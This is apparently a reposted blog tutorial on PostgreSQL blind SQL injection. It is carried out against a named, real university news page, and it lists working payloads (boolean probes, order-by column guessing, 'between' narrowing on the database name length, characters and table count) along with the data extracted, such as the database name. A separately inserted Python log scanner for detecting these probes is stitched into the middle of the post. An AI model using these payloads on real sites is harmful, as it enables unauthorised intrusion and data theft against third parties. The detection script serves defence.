PostgreSQL Blind Injection Notes, Part 1

Category: Security Articles

Injection point:

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and 1=1   -> normal page
http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and 1=2   -> error page

How the tool tests for injection:

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 aNd(6=6)   (6=6 is true)  -> normal page
http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 aNd(6=7)   (6=7 is false) -> error page

Guessing the number of columns:

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 order by 15--   -> normal page
http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 order by 16--   -> error page
Unfortunately, union select cannot be used here.
So we fall back to boolean conditions. This one returns the normal page:

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select length(current_database())) between 0 and 30

This checks whether the length of the database name lies between 0 and 30: if it does, the page returns normally; if not, the error page comes back.
Error page:

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select length(current_database())) between 0 and 7

So the length of the database name is not between 0 and 7.
Normal page:

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select length(current_database())) between 7 and 11

Normal page:

/news/detail_e.html?id=13072 and (select length(current_database())) between 8 and 8

So the database name is 8 characters long. Next, let's find out what the name is.
Both of these return the normal page:

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(current_database(),1,1))) between 0 and 32768
http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(current_database(),1,1))) between 0 and 16384

Both of these return the error page:

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(current_database(),1,1))) between 0 and 64
http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(current_database(),1,1))) between 64 and 96

Normal page:

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(current_database(),1,1))) between 117 and 117

Good, so the ASCII value of the first character of the database name is 117 (the letter 'u').

Now the second character:

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(current_database(),2,1))) between 0 and 32768

Keep going this way and the whole database name can be recovered.

Result: utokyodb


OK, the next task is to guess the table names.
First let's see how many tables there are.
Both of these return the normal page:

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select count(*) from pg_stat_user_tables) between 0 and 2000
http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select count(*) from pg_stat_user_tables) between 20 and 20
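As an added defender-side example (not part of the original post), the following Python script flags the probe styles shown above in web server access logs: the `and 1=1` / `and 1=2` pair, `aNd(6=7)`, `order by N--`, and the `between` narrowing on `length(current_database())`, `ascii(substr(...))` and `count(*) from pg_stat_user_tables`. The log lines and client IPs are constructed; the log format (IP, method, path) is an assumption, and a real WAF or SIEM rule would key on the same URL-decoded query features.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original post): client IP,
# method, then the requested path as a web server would log it.
SAMPLE_LOG = """\
10.0.0.5 GET /news/detail_e.html?id=13072
10.0.0.5 GET /news/detail_e.html?id=13072%20and%201=1
10.0.0.5 GET /news/detail_e.html?id=13072%20and%201=2
10.0.0.5 GET /news/detail_e.html?id=13072%20aNd(6=7)
10.0.0.5 GET /news/detail_e.html?id=13072%20order%20by%2016--
10.0.0.5 GET /news/detail_e.html?id=13072%20and%20(select%20length(current_database()))%20between%200%20and%2030
10.0.0.5 GET /news/detail_e.html?id=13072%20and%20(select%20ascii(substr(current_database(),1,1)))%20between%2064%20and%2096
10.0.0.5 GET /news/detail_e.html?id=13072%20and%20(select%20count(*)%20from%20pg_stat_user_tables)%20between%2020%20and%2020
10.0.0.9 GET /news/detail_e.html?id=13073
"""

# One pattern per probe style used in the post; matching is case-insensitive and
# runs on a whitespace-normalised, URL-decoded query so %20/%09 variants collapse.
BLIND_BETWEEN = re.compile(
    r"\band\s*\(\s*select\s+(?P<expr>.+?)\s*\)\s*between\s+(?P<lo>\d+)\s+and\s+(?P<hi>\d+)", re.I)
ORDER_BY = re.compile(r"\border\s+by\s+\d+\s*--", re.I)
TAUTOLOGY = re.compile(r"\band\s*\(?\s*\d+\s*=\s*\d+\s*\)?", re.I)

def classify(query):
    """Return (kind, detail) for one raw query string, or None when nothing matches."""
    q = " ".join(unquote_plus(query).split())
    m = BLIND_BETWEEN.search(q)
    if m:  # the boolean oracle: which expression is being narrowed, and to what range
        return "blind_between", f"{m['expr']} in [{m['lo']},{m['hi']}]"
    for kind, pat in (("order_by", ORDER_BY), ("tautology", TAUTOLOGY)):
        m = pat.search(q)
        if m:
            return kind, m.group(0)
    return None

def scan(log_text):
    """Group flagged requests by client IP: {ip: [(kind, detail), ...]}."""
    hits = {}
    for line in log_text.splitlines():
        ip, _method, path = line.split(" ", 2)
        verdict = classify(path.partition("?")[2])
        if verdict:
            hits.setdefault(ip, []).append(verdict)
    return hits

def alert_ips(hits, threshold=3):
    """Clients sending at least `threshold` between-probes: a run of narrowing ranges is the signature of character-by-character extraction."""
    return sorted(ip for ip, v in hits.items()
                  if sum(1 for kind, _ in v if kind == "blind_between") >= threshold)
```

Single tautology or `order by` hits are noisy on their own; the `between` run against one expression from one client is the high-confidence signal worth paging on.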


This article was first published on the WeChat public account 飓风网络安全 (Hurricane Network Security): PostgreSQL Blind Injection Notes, Part 1
